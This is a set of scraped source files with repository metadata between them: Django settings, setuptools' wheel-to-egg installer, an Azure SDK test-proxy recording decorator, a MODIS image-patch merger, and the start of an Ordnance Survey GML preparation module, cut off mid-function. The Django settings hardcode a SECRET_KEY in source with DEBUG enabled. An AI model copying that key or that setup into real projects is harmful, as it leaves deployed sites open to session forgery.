# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from an environment variable before any non-local deployment.
SECRET_KEY = '@bq$b#=f^5opwd&7+w%j8f3+qfl23##ccrh38l%rd1m*rq8+ur'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'catalog.apps.CatalogConfig', # project-local app
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'untitled3.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')]
        ,
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'untitled3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
"katandser96@mail.ru"
] | katandser96@mail.ru |
3738260cd7566f69bb08576a36a0616524060ba0 | ed6625148299e759f39359db9f932dd391b8e86f | /personal_env/lib/python3.8/site-packages/setuptools/wheel.py | e17742f100132d61e0cf7083ef2ce3b873a0ef4a | [
"MIT"
] | permissive | jestinmwilson/personal-website | 128c4717b21fa6fff9df8295b1137f32bbe44b55 | 6e47a7f33ed3b1ca5c1d42c89c5380d22992ed74 | refs/heads/main | 2023-08-28T11:31:07.916714 | 2021-10-14T09:41:13 | 2021-10-14T09:41:13 | 414,847,553 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,675 | py | """Wheels support."""
from distutils.util import get_platform
from distutils import log
import email
import itertools
import os
import posixpath
import re
import zipfile
import pkg_resources
import setuptools
from pkg_resources import parse_version
from setuptools.extern.packaging.tags import sys_tags
from setuptools.extern.packaging.utils import canonicalize_name
from setuptools.extern.six import PY3
from setuptools.command.egg_info import write_requirements
__metaclass__ = type
WHEEL_NAME = re.compile(
r"""^(?P<project_name>.+?)-(?P<version>\d.*?)
((-(?P<build>\d.*?))?-(?P<py_version>.+?)-(?P<abi>.+?)-(?P<platform>.+?)
)\.whl$""",
re.VERBOSE).match
NAMESPACE_PACKAGE_INIT = '''\
try:
__import__('pkg_resources').declare_namespace(__name__)
except ImportError:
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
'''
def unpack(src_dir, dst_dir):
    '''Move everything under `src_dir` to `dst_dir`, and delete the former.'''
    for dirpath, dirnames, filenames in os.walk(src_dir):
        subdir = os.path.relpath(dirpath, src_dir)
        for f in filenames:
            src = os.path.join(dirpath, f)
            dst = os.path.join(dst_dir, subdir, f)
            os.renames(src, dst)
        # Iterate in reverse so `del dirnames[n]` does not shift the indices
        # of entries not yet visited.
        for n, d in reversed(list(enumerate(dirnames))):
            src = os.path.join(dirpath, d)
            dst = os.path.join(dst_dir, subdir, d)
            if not os.path.exists(dst):
                # Directory does not exist in destination,
                # rename it and prune it from os.walk list.
                os.renames(src, dst)
                del dirnames[n]
    # Cleanup.
    # Anything left behind must be empty directories (os.renames above may
    # leave pruned ancestors); files would indicate a move failure.
    for dirpath, dirnames, filenames in os.walk(src_dir, topdown=True):
        assert not filenames
        os.rmdir(dirpath)
class Wheel:
    """A .whl file: parses its filename fields and can install itself as an
    .egg directory (the legacy easy_install layout)."""
    def __init__(self, filename):
        # Parse project_name/version/build/py_version/abi/platform out of
        # the wheel filename and bind each as an attribute.
        match = WHEEL_NAME(os.path.basename(filename))
        if match is None:
            raise ValueError('invalid wheel name: %r' % filename)
        self.filename = filename
        for k, v in match.groupdict().items():
            setattr(self, k, v)
    def tags(self):
        '''List tags (py_version, abi, platform) supported by this wheel.'''
        return itertools.product(
            self.py_version.split('.'),
            self.abi.split('.'),
            self.platform.split('.'),
        )
    def is_compatible(self):
        '''Is the wheel is compatible with the current platform?'''
        supported_tags = set((t.interpreter, t.abi, t.platform) for t in sys_tags())
        return next((True for t in self.tags() if t in supported_tags), False)
    def egg_name(self):
        # Egg file name equivalent to this wheel; 'any' wheels get no
        # platform component.
        return pkg_resources.Distribution(
            project_name=self.project_name, version=self.version,
            platform=(None if self.platform == 'any' else get_platform()),
        ).egg_name() + '.egg'
    def get_dist_info(self, zf):
        # find the correct name of the .dist-info dir in the wheel file
        for member in zf.namelist():
            dirname = posixpath.dirname(member)
            if (dirname.endswith('.dist-info') and
                    canonicalize_name(dirname).startswith(
                        canonicalize_name(self.project_name))):
                return dirname
        raise ValueError("unsupported wheel format. .dist-info not found")
    def install_as_egg(self, destination_eggdir):
        '''Install wheel as an egg directory.'''
        with zipfile.ZipFile(self.filename) as zf:
            self._install_as_egg(destination_eggdir, zf)
    def _install_as_egg(self, destination_eggdir, zf):
        # Extract, convert metadata to egg format, relocate data entries and
        # repair namespace packages, in that order.
        dist_basename = '%s-%s' % (self.project_name, self.version)
        dist_info = self.get_dist_info(zf)
        dist_data = '%s.data' % dist_basename
        egg_info = os.path.join(destination_eggdir, 'EGG-INFO')
        self._convert_metadata(zf, destination_eggdir, dist_info, egg_info)
        self._move_data_entries(destination_eggdir, dist_data)
        self._fix_namespace_packages(egg_info, destination_eggdir)
    @staticmethod
    def _convert_metadata(zf, destination_eggdir, dist_info, egg_info):
        """Extract the wheel and rewrite its .dist-info metadata as EGG-INFO."""
        def get_metadata(name):
            with zf.open(posixpath.join(dist_info, name)) as fp:
                value = fp.read().decode('utf-8') if PY3 else fp.read()
                return email.parser.Parser().parsestr(value)
        wheel_metadata = get_metadata('WHEEL')
        # Check wheel format version is supported.
        wheel_version = parse_version(wheel_metadata.get('Wheel-Version'))
        wheel_v1 = (
            parse_version('1.0') <= wheel_version < parse_version('2.0dev0')
        )
        if not wheel_v1:
            raise ValueError(
                'unsupported wheel format version: %s' % wheel_version)
        # Extract to target directory.
        os.mkdir(destination_eggdir)
        zf.extractall(destination_eggdir)
        # Convert metadata.
        dist_info = os.path.join(destination_eggdir, dist_info)
        dist = pkg_resources.Distribution.from_location(
            destination_eggdir, dist_info,
            metadata=pkg_resources.PathMetadata(destination_eggdir, dist_info),
        )
        # Note: Evaluate and strip markers now,
        # as it's difficult to convert back from the syntax:
        # foobar; "linux" in sys_platform and extra == 'test'
        def raw_req(req):
            req.marker = None
            return str(req)
        install_requires = list(sorted(map(raw_req, dist.requires())))
        extras_require = {
            extra: sorted(
                req
                for req in map(raw_req, dist.requires((extra,)))
                if req not in install_requires
            )
            for extra in dist.extras
        }
        os.rename(dist_info, egg_info)
        os.rename(
            os.path.join(egg_info, 'METADATA'),
            os.path.join(egg_info, 'PKG-INFO'),
        )
        setup_dist = setuptools.Distribution(
            attrs=dict(
                install_requires=install_requires,
                extras_require=extras_require,
            ),
        )
        # Temporarily disable info traces.
        log_threshold = log._global_log.threshold
        log.set_threshold(log.WARN)
        try:
            write_requirements(
                setup_dist.get_command_obj('egg_info'),
                None,
                os.path.join(egg_info, 'requires.txt'),
            )
        finally:
            log.set_threshold(log_threshold)
    @staticmethod
    def _move_data_entries(destination_eggdir, dist_data):
        """Move data entries to their correct location."""
        dist_data = os.path.join(destination_eggdir, dist_data)
        dist_data_scripts = os.path.join(dist_data, 'scripts')
        if os.path.exists(dist_data_scripts):
            egg_info_scripts = os.path.join(
                destination_eggdir, 'EGG-INFO', 'scripts')
            os.mkdir(egg_info_scripts)
            for entry in os.listdir(dist_data_scripts):
                # Remove bytecode, as it's not properly handled
                # during easy_install scripts install phase.
                if entry.endswith('.pyc'):
                    os.unlink(os.path.join(dist_data_scripts, entry))
                else:
                    os.rename(
                        os.path.join(dist_data_scripts, entry),
                        os.path.join(egg_info_scripts, entry),
                    )
            os.rmdir(dist_data_scripts)
        # Merge the remaining .data subtrees into the egg root.
        for subdir in filter(os.path.exists, (
                os.path.join(dist_data, d)
                for d in ('data', 'headers', 'purelib', 'platlib')
        )):
            unpack(subdir, destination_eggdir)
        if os.path.exists(dist_data):
            os.rmdir(dist_data)
    @staticmethod
    def _fix_namespace_packages(egg_info, destination_eggdir):
        """Recreate missing __init__.py files for declared namespace packages."""
        namespace_packages = os.path.join(
            egg_info, 'namespace_packages.txt')
        if os.path.exists(namespace_packages):
            with open(namespace_packages) as fp:
                namespace_packages = fp.read().split()
            for mod in namespace_packages:
                mod_dir = os.path.join(destination_eggdir, *mod.split('.'))
                mod_init = os.path.join(mod_dir, '__init__.py')
                if not os.path.exists(mod_dir):
                    os.mkdir(mod_dir)
                if not os.path.exists(mod_init):
                    with open(mod_init, 'w') as fp:
                        fp.write(NAMESPACE_PACKAGE_INIT)
| [
"noreply@github.com"
] | noreply@github.com |
9207964a8abeafead8e2e062e1c63f4719aa680e | d7016f69993570a1c55974582cda899ff70907ec | /tools/azure-sdk-tools/devtools_testutils/proxy_testcase.py | 0c0fe3dc403f3642e5552ec84ae5ffe10acbc867 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 10,296 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
import six
import os
from typing import TYPE_CHECKING
import urllib.parse as url_parse
from azure.core.exceptions import HttpResponseError, ResourceNotFoundError
from azure.core.pipeline.policies import ContentDecodePolicy
# the functions we patch
from azure.core.pipeline.transport import RequestsTransport
# the trimming function to clean up incoming arguments to the test function we are wrapping
from azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function
from .config import PROXY_URL
from .helpers import get_test_id, is_live, is_live_and_not_recording, set_recording_id
from .proxy_startup import discovered_roots
from urllib3 import PoolManager, Retry
from urllib3.exceptions import HTTPError
import json
if TYPE_CHECKING:
from typing import Callable, Dict, Tuple
from azure.core.pipeline.transport import HttpRequest
# To learn about how to migrate SDK tests to the test proxy, please refer to the migration guide at
# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
# Shared urllib3 client for talking to the test proxy. When a custom CA
# bundle is configured (e.g. for the proxy's TLS certificate), verify
# connections against it; otherwise use the default pool.
if os.getenv("REQUESTS_CA_BUNDLE"):
    http_client = PoolManager(
        retries=Retry(total=3, raise_on_status=False),
        cert_reqs="CERT_REQUIRED",
        ca_certs=os.getenv("REQUESTS_CA_BUNDLE"),
    )
else:
    http_client = PoolManager(retries=Retry(total=3, raise_on_status=False))
# defaults
# Test-proxy endpoints for starting/stopping record and playback sessions.
RECORDING_START_URL = "{}/record/start".format(PROXY_URL)
RECORDING_STOP_URL = "{}/record/stop".format(PROXY_URL)
PLAYBACK_START_URL = "{}/playback/start".format(PROXY_URL)
PLAYBACK_STOP_URL = "{}/playback/stop".format(PROXY_URL)
def get_recording_assets(test_id: str) -> str:
    """
    Used to retrieve the assets.json given a PYTEST_CURRENT_TEST test id.

    Returns the assets.json path relative to the discovered root (with
    forward slashes), or None when no assets.json is found.
    """
    for root in discovered_roots:
        current_dir = os.path.dirname(test_id)
        # Ascend from the test's directory; os.path.dirname is a fixed point
        # at the filesystem root, which terminates the loop.
        while current_dir is not None and not (os.path.dirname(current_dir) == current_dir):
            possible_assets = os.path.join(current_dir, "assets.json")
            possible_root = os.path.join(current_dir, ".git")
            # we need to check for assets.json first!
            if os.path.exists(os.path.join(root, possible_assets)):
                complete_path = os.path.abspath(os.path.join(root, possible_assets))
                return os.path.relpath(complete_path, root).replace("\\", "/")
            # we need the git check to prevent ascending out of the repo
            elif os.path.exists(os.path.join(root, possible_root)):
                # Repo root reached without finding assets.json: abandon the
                # whole search (returns from the function, not just this root).
                return None
            else:
                current_dir = os.path.dirname(current_dir)
    return None
def start_record_or_playback(test_id: str) -> "Tuple[str, Dict[str, str]]":
    """Sends a request to begin recording or playing back the provided test.
    This returns a tuple, (a, b), where a is the recording ID of the test and b is the `variables` dictionary that maps
    test variables to values. If no variable dictionary was stored when the test was recorded, b is an empty dictionary.

    :raises HttpResponseError: if the proxy rejects the start request.
    :raises ValueError: in playback, when no recording exists for the test or
        the stored variables are not valid JSON.
    """
    variables = {} # this stores a dictionary of test variable values that could have been stored with a recording
    json_payload = {"x-recording-file": test_id}
    # Point the proxy at the externalized-recordings manifest when one exists.
    assets_json = get_recording_assets(test_id)
    if assets_json:
        json_payload["x-recording-assets-file"] = assets_json
    encoded_payload = json.dumps(json_payload).encode("utf-8")
    if is_live():
        # Live mode: start a recording session on the proxy.
        result = http_client.request(
            method="POST",
            url=RECORDING_START_URL,
            body=encoded_payload,
        )
        if result.status != 200:
            message = six.ensure_str(result.data)
            raise HttpResponseError(message=message)
        recording_id = result.headers["x-recording-id"]
    else:
        # Playback mode: start replaying the stored recording.
        result = http_client.request(
            method="POST",
            url=PLAYBACK_START_URL,
            body=encoded_payload,
        )
        if result.status != 200:
            message = six.ensure_str(result.data)
            raise HttpResponseError(message=message)
        try:
            recording_id = result.headers["x-recording-id"]
        except KeyError as ex:
            six.raise_from(ValueError("No recording file found for {}".format(test_id)), ex)
        if result.data:
            # The playback response body carries the recorded test variables.
            try:
                variables = json.loads(result.data.decode("utf-8"))
            except ValueError as ex: # would be a JSONDecodeError on Python 3, which subclasses ValueError
                six.raise_from(
                    ValueError("The response body returned from starting playback did not contain valid JSON"),
                    ex,
                )
    # set recording ID in a module-level variable so that sanitizers can access it
    set_recording_id(test_id, recording_id)
    return (recording_id, variables)
def stop_record_or_playback(test_id: str, recording_id: str, test_variables: "Dict[str, str]") -> None:
    """End the proxy session for the given test.

    In live mode the recording is saved along with `test_variables`; in
    playback mode the playback session is simply stopped.

    :raises HttpResponseError: if the proxy request fails (e.g. because a
        recorded test variable is not a string).
    """
    try:
        if is_live():
            http_client.request(
                method="POST",
                url=RECORDING_STOP_URL,
                headers={
                    "x-recording-file": test_id,
                    "x-recording-id": recording_id,
                    "x-recording-save": "true",
                    "Content-Type": "application/json",
                },
                # tests don't record successfully unless test_variables is a dictionary
                body=json.dumps(test_variables).encode("utf-8") if test_variables else "{}",
            )
        else:
            http_client.request(
                method="POST",
                url=PLAYBACK_STOP_URL,
                headers={"x-recording-id": recording_id},
            )
    except HTTPError as e:
        raise HttpResponseError(
            "The test proxy ran into an error while ending the session. Make sure any test variables you record have "
            "string values."
        ) from e
def get_proxy_netloc() -> "Dict[str, str]":
    """Return the scheme and network location of the test proxy as a dict."""
    parts = url_parse.urlparse(PROXY_URL)
    return {
        "scheme": parts.scheme,
        "netloc": parts.netloc,
    }
def transform_request(request: "HttpRequest", recording_id: str) -> None:
    """Redirect the request to the test proxy, and store the original request URI in a header"""
    parsed = url_parse.urlparse(request.url)
    proxied_url = parsed._replace(**get_proxy_netloc()).geturl()

    # Record where the request was originally headed so the proxy (and the
    # response rewriting in combined_call) can restore it later
    if request.headers.get("x-recording-upstream-base-uri", None) is None:
        request.headers["x-recording-upstream-base-uri"] = "{}://{}".format(parsed.scheme, parsed.netloc)
    request.headers["x-recording-id"] = recording_id
    request.headers["x-recording-mode"] = "record" if is_live() else "playback"

    request.url = proxied_url
def recorded_by_proxy(test_func: "Callable") -> None:
    """Decorator that redirects network requests to target the azure-sdk-tools test proxy. Use with recorded tests.

    For more details and usage examples, refer to
    https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md

    :param test_func: The test method being wrapped. It may optionally accept a
        `variables` keyword argument to receive variables stored in the recording.
    :returns: The wrapping function that runs the test inside a proxy session.
    """

    def record_wrap(*args, **kwargs):
        def transform_args(*args, **kwargs):
            # Positional arg 1 of RequestsTransport.send is the outgoing
            # request; redirect it to the test proxy in place
            copied_positional_args = list(args)
            request = copied_positional_args[1]

            transform_request(request, recording_id)

            return tuple(copied_positional_args), kwargs

        # Work on a copy so fixtures consumed here don't leak into the test call
        trimmed_kwargs = {k: v for k, v in kwargs.items()}
        trim_kwargs_from_test_function(test_func, trimmed_kwargs)

        # Live run with recording disabled: execute the test untouched
        if is_live_and_not_recording():
            return test_func(*args, **trimmed_kwargs)

        test_id = get_test_id()
        recording_id, variables = start_record_or_playback(test_id)

        # Monkeypatch the shared transport so every request is proxied;
        # restored unconditionally in the `finally` block below
        original_transport_func = RequestsTransport.send

        def combined_call(*args, **kwargs):
            adjusted_args, adjusted_kwargs = transform_args(*args, **kwargs)
            result = original_transport_func(*adjusted_args, **adjusted_kwargs)

            # make the x-recording-upstream-base-uri the URL of the request
            # this makes the request look like it was made to the original endpoint instead of to the proxy
            # without this, things like LROPollers can get broken by polling the wrong endpoint
            parsed_result = url_parse.urlparse(result.request.url)
            upstream_uri = url_parse.urlparse(result.request.headers["x-recording-upstream-base-uri"])
            upstream_uri_dict = {
                "scheme": upstream_uri.scheme,
                "netloc": upstream_uri.netloc,
            }
            original_target = parsed_result._replace(**upstream_uri_dict).geturl()

            result.request.url = original_target
            return result

        RequestsTransport.send = combined_call

        # call the modified function
        # we define test_variables before invoking the test so the variable is defined in case of an exception
        test_variables = None
        try:
            try:
                # First try passing recorded variables through; tests that
                # don't accept them raise TypeError and are retried without
                test_variables = test_func(*args, variables=variables, **trimmed_kwargs)
            except TypeError:
                logger = logging.getLogger()
                logger.info(
                    "This test can't accept variables as input. The test method should accept `**kwargs` and/or a "
                    "`variables` parameter to make use of recorded test variables."
                )
                test_variables = test_func(*args, **trimmed_kwargs)
        except ResourceNotFoundError as error:
            # Surface the service's error message (the proxy response body)
            # in the re-raised error for easier debugging
            error_body = ContentDecodePolicy.deserialize_from_http_generics(error.response)
            message = error_body.get("message") or error_body.get("Message")
            error_with_message = ResourceNotFoundError(message=message, response=error.response)
            six.raise_from(error_with_message, error)
        finally:
            # Always restore the real transport and close the proxy session,
            # even when the test raised
            RequestsTransport.send = original_transport_func
            stop_record_or_playback(test_id, recording_id, test_variables)

        return test_variables

    return record_wrap
| [
"noreply@github.com"
] | noreply@github.com |
4e543bc8c6bb809b7f5768311a7fdfba0a10f29d | 5f063a25f88dded96928282dd79bd06c8c0ee805 | /testdata/mergeImage.py | 357b17abdcd3f0a6336eac3dc2c0337d0ae03c00 | [
"MIT"
] | permissive | Cogito2012/pix2pix-tf-modis | f87a0e77b83d26a9cac2e7cdec44eb39a7ad0eae | 1fbfaf7665f6b794bbd800185b0c34e5522d3ba0 | refs/heads/master | 2021-01-22T11:28:50.005570 | 2017-05-29T03:18:09 | 2017-05-29T03:18:09 | 92,701,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | # merger patches to China.bmp
# Merge translated patches back into a single mosaic (ModisChina.bmp).
# Patches are named patch_h<col>v<row>_trans.png; each is pasted into a
# (patchnum_y * patchsize) x (patchnum_x * patchsize) canvas.
import os
import cv2
import numpy as np

input_dir = "./patches_translate"
dest_file = "ModisChina.bmp"

patchsize = 512
patchnum_x = 30
patchnum_y = 24

# Canvas starts out black, so regions for missing patches simply stay zero
Modischina = np.zeros([patchnum_y * patchsize, patchnum_x * patchsize, 3])

# Patch identifiers, e.g. 'h00v00' .. 'h29v23'
fileIDs = list("h%02dv%02d" % (i, j) for i in range(patchnum_x) for j in range(patchnum_y))
image_list = os.listdir(input_dir)

for fileid in fileIDs:
    # get the row and column index of Modischina from the id: h<col>v<row>
    col = int(fileid[1:3])
    row = int(fileid[4:6])

    filename = "patch_%s_trans.png" % fileid
    if filename not in image_list:
        # Skip missing patches and leave the canvas region black. The
        # original fell through to cv2.imread, which returns None for a
        # missing file and would crash the paste below. (Also converted the
        # Python 2 `print fileIDs.index(fileid)` statement, a syntax error
        # under Python 3.)
        print("PNG file: %s is missing!\n" % fileid)
        print(fileIDs.index(fileid))
        continue

    imagefile = os.path.join(input_dir, filename)
    patch = cv2.imread(imagefile)
    Modischina[row * patchsize:(row + 1) * patchsize,
               col * patchsize:(col + 1) * patchsize, :] = patch

cv2.imwrite(dest_file, Modischina)
print("Done!")
"wtbao@whu.edu.cn"
] | wtbao@whu.edu.cn |
a291571004a5644ecfc815c6c978d6daa08d8d74 | 382240eed333d0577b23fbc81b06429a17ce544d | /python/prep_osgml.py | a6c2332d22bd4eb0b1acdc95aae21d68ee5bcc9b | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rjspiers/Loader | e5c3f0ca9c54c6dd443521936a238de7233094d4 | 560f216f4703bc5850ddc889ae347db3ec689902 | refs/heads/master | 2021-01-01T18:18:52.957426 | 2017-07-22T17:13:19 | 2017-07-22T17:13:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,260 | py | """
A collection of classes used to manipulate Ordnance Survey GB GML data,
used with prepgml4ogr.py.
"""
from lxml import etree
from lxml import objectify
import json
import lxml
import os
import re
import sys
# Mock arcpy which is imported by not used in the ESRI UK modules used to
# classify OSMM Topo features
sys.modules['arcpy'] = __import__('sys')
import osmm_topo_style.area_style
import osmm_topo_style.bnd_style
import osmm_topo_style.line_style
import osmm_topo_style.pnt_style
import osmm_topo_style.sym_style
import osmm_topo_style.txt_style
class prep_osgml():
    """
    Base class that provides the main interface methods `prepare_feature` and
    `get_feat_types` and performs basic manipulation such as exposing the fid,
    adding an element containing the filename of the source and adding an
    element with the orientation in degrees.
    """
    def __init__(self, inputfile):
        self.inputfile = inputfile
        self.feat_types = []

    def get_feat_types(self):
        """Return the list of feature type (element) names handled by this class."""
        return self.feat_types

    def prepare_feature(self, feat_str):
        """Parse a single feature GML string, manipulate it and return the
        result serialised as a UTF-8 string."""
        # Parse the xml string into something useful
        feat_elm = etree.fromstring(feat_str)
        feat_elm = self._prepare_feat_elm(feat_elm)

        return etree.tostring(feat_elm,
                              encoding='UTF-8',
                              pretty_print=True).decode('utf_8')

    def _prepare_feat_elm(self, feat_elm):
        # Hook point for subclasses: apply each manipulation in turn
        feat_elm = self._set_srs(feat_elm)
        feat_elm = self._add_fid_elm(feat_elm)
        feat_elm = self._add_filename_elm(feat_elm)
        feat_elm = self._add_orientation_degree_elms(feat_elm)

        return feat_elm

    def _set_srs(self, feat_elm):
        # Normalise every srsName attribute to British National Grid
        srs_elms = feat_elm.xpath('//*[@srsName]')
        for elm in srs_elms:
            elm.attrib['srsName'] = 'EPSG:27700'

        return feat_elm

    def _add_fid_elm(self, feat_elm):
        # Create an element with the fid
        elm = etree.SubElement(feat_elm, "fid")
        elm.text = feat_elm.get('fid')

        return feat_elm

    def _add_filename_elm(self, feat_elm):
        # Create an element with the filename
        elm = etree.SubElement(feat_elm, "filename")
        elm.text = os.path.basename(self.inputfile)

        return feat_elm

    def _add_orientation_degree_elms(self, feat_elm):
        # Orientation values are expressed in tenths of a degree; expose a
        # whole-degree value alongside each one
        orientation_elms = feat_elm.xpath('//orientation')
        for elm in orientation_elms:
            # Add a new orientDeg element as a child of the orientation
            # element's parent holding orientation // 10. Floor division is
            # used explicitly so the result is an integer on both Python 2
            # and Python 3 (the original '/' yields a float on Python 3,
            # which would serialise as e.g. '4.0' instead of '4').
            degree_elm = etree.SubElement(elm.getparent(), "orientDeg")
            degree_elm.text = str(int(elm.text) // 10)

        return feat_elm
class prep_vml(prep_osgml):
    """
    Preparation class for OS VectorMap Local features.

    Captures the tile's creationDate as it streams past so it can be attached
    to every subsequent feature, and records the source tile name derived
    from the input filename.
    """
    def __init__(self, inputfile):
        prep_osgml.__init__(self, inputfile)
        self.feat_types = [
            'Text',
            'VectorMapPoint',
            'Line',
            'RoadCLine',
            'Area',
            'creationDate'
        ]

    def _prepare_feat_elm(self, feat_elm):
        # creationDate is not a real feature: stash its value so it can be
        # copied onto every following feature and pass it through untouched.
        # NOTE(review): this assumes the creationDate element appears before
        # the features in the source GML, which is potentially brittle.
        if feat_elm.tag == 'creationDate':
            self.creation_date = feat_elm.text
            return feat_elm

        prepared = prep_osgml._prepare_feat_elm(self, feat_elm)
        prepared = self._add_tile_elm(prepared)
        return self._add_creation_date_elm(prepared)

    def _add_tile_elm(self, feat_elm):
        # The tile name is the input filename without its extension
        tile_elm = etree.SubElement(feat_elm, "tile")
        tile_elm.text = os.path.splitext(os.path.basename(self.inputfile))[0]
        return feat_elm

    def _add_creation_date_elm(self, feat_elm):
        # Copy the creationDate captured earlier onto this feature
        date_elm = etree.SubElement(feat_elm, "creationDate")
        date_elm.text = self.creation_date
        return feat_elm
class prep_vmd(prep_osgml):
    """
    Preparation class for OS VectorMap District features.

    Identical to `prep_osgml` except that the feature identifier is read
    from the `id` attribute rather than `fid`.
    """
    def __init__(self, inputfile):
        prep_osgml.__init__(self, inputfile)
        self.feat_types = [
            'AdministrativeBoundary',
            'Airport',
            'Building',
            'ElectricityTransmissionLine',
            'Foreshore',
            'Glasshouse',
            'HeritageSite',
            'Land',
            'NamedPlace',
            'Woodland',
            'Ornament',
            'PublicAmenity',
            'RailwayStation',
            'RailwayTrack',
            'RailwayTunnel',
            'Road',
            'MotorwayJunction',
            'RoadTunnel',
            'Roundabout',
            'SpotHeight',
            'SurfaceWater_Area',
            'SurfaceWater_Line',
            'TidalBoundary',
            'TidalWater'
        ]

    def _add_fid_elm(self, feat_elm):
        # VMD features carry their identifier in an 'id' attribute
        fid_elm = etree.SubElement(feat_elm, "fid")
        fid_elm.text = feat_elm.get('id')
        return fid_elm.getparent()
class prep_osmm_topo(prep_osgml):
    """
    Preparation class for OS MasterMap features which in addition to the work
    performed by `prep_osgml` adds `themes`, `descriptiveGroups` and
    `descriptiveTerms` elements containing a delimited string of the attributes
    that can appear multiple times, and derives cartographic style code and
    description elements via the ESRI UK OSMM Topo style modules.
    """
    def __init__(self, inputfile):
        prep_osgml.__init__(self, inputfile)
        self.feat_types = [
            'BoundaryLine',
            'CartographicSymbol',
            'CartographicText',
            'TopographicArea',
            'TopographicLine',
            'TopographicPoint'
        ]
        # Delimiter used when flattening multi-valued attributes
        self.list_seperator = ', '

    def _prepare_feat_elm(self, feat_elm):
        feat_elm = prep_osgml._prepare_feat_elm(self, feat_elm)
        feat_elm = self._add_lists_elms(feat_elm)
        feat_elm = self._add_style_elms(feat_elm)

        return feat_elm

    def _add_lists_elms(self, feat_elm):
        # Flatten each multi-valued attribute (theme -> themes etc.) into a
        # single delimited element
        feat_elm = self._create_list_of_terms(feat_elm, 'theme')
        feat_elm = self._create_list_of_terms(feat_elm, 'descriptiveGroup')
        feat_elm = self._create_list_of_terms(feat_elm, 'descriptiveTerm')

        return feat_elm

    def _add_style_elms(self, feat_elm):
        """Append styleCode/styleDescription elements (plus extra label
        placement elements for CartographicText) derived via the ESRI UK
        OSMM Topo style modules."""
        descriptiveTerms = self._get_list_of_terms(feat_elm, 'descriptiveTerms')
        descriptiveGroups = self._get_list_of_terms(feat_elm, 'descriptiveGroups')
        make = self._get_list_of_terms(feat_elm, 'make')
        physicalPresence = self._get_list_of_terms(feat_elm, 'physicalPresence')
        # NOTE(review): int('') raises ValueError, so this assumes every
        # feature carries a featureCode — confirm against the source data
        featureCode = int(self._get_list_of_terms(feat_elm, 'featureCode'))

        # Defaults used when the feature type is not matched below
        style_code = 99
        style_description = 'Unclassified'

        # The `row` lists mimic the column layout the ESRI style modules
        # expect; the first three entries are unused placeholders.
        # TODO(review): confirm the column order against each style module.
        if feat_elm.tag == 'TopographicArea':
            row = ['', '', '', descriptiveTerms, descriptiveGroups, make]
            style_code = osmm_topo_style.area_style.CalculateStyleCode(row)
            style_description = osmm_topo_style.area_style.CalculateStyleDescription(row)
        elif feat_elm.tag == 'TopographicLine':
            row = ['', '', '', descriptiveTerms, descriptiveGroups, make, physicalPresence]
            style_code = osmm_topo_style.line_style.CalculateStyleCode(row)
            style_description = osmm_topo_style.line_style.CalculateStyleDescription(row)
        elif feat_elm.tag == 'TopographicPoint':
            row = ['', '', '', descriptiveGroups, descriptiveTerms, make]
            style_code = osmm_topo_style.pnt_style.CalculateStyleCode(row)
            style_description = osmm_topo_style.pnt_style.CalculateStyleDescription(row)
        elif feat_elm.tag == 'BoundaryLine':
            row = ['', '', '', featureCode]
